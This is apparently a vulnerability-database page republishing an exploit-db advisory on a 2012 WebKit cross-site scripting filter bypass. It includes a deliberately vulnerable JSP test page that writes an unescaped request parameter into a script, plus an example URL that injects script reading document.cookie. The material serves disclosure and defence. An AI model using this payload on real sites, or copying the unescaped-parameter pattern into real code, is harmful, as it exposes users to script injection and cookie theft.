Lucene search
+L

WebKit Cross-Site Scripting Filter - 'Cross-Site ScriptingAuditor.cpp' Security Bypass

🗓️ 19 Jul 2012 00:00:00Reported by Tushar DalviType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 20 Views

Webkit Cross-Site Scripting Filter Bypas

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2012-5851
19 Jul 201200:00
circl
CVE
CVE-2012-5851
15 Nov 201211:00
cve
Cvelist
CVE-2012-5851
15 Nov 201211:00
cvelist
Debian CVE
CVE-2012-5851
15 Nov 201211:00
debiancve
EUVD
EUVD-2012-5729
7 Oct 202500:30
euvd
NVD
CVE-2012-5851
15 Nov 201211:58
nvd
OpenVAS
Google Chrome Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability - Windows
21 Nov 201200:00
openvas
OpenVAS
Google Chrome Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability - Linux
21 Nov 201200:00
openvas
OpenVAS
Google Chrome Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability - Mac OS X
21 Nov 201200:00
openvas
OpenVAS
Apple Safari Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability - Windows
21 Nov 201200:00
openvas
Rows per page
source: https://www.securityfocus.com/bid/56570/info

WebKit is prone to a security-bypass vulnerability.

An attacker can exploit this vulnerability to bypass the cross-site scripting filter mechanism. Successful exploits may allow attackers to execute arbitrary script code and steal cookie-based authentication credentials.

Code in test.jsp:

<title>Test Page</title>
<script>
var foo = "<%= request.getParameter("foo") %>";
document.write("<text>Welcome "+ foo + "</text>");
</script>

Example URI:

http://www.domain.com/test.jsp?foo=2"; alert(document.cookie); var a="1

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Aug 2015 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.02285
20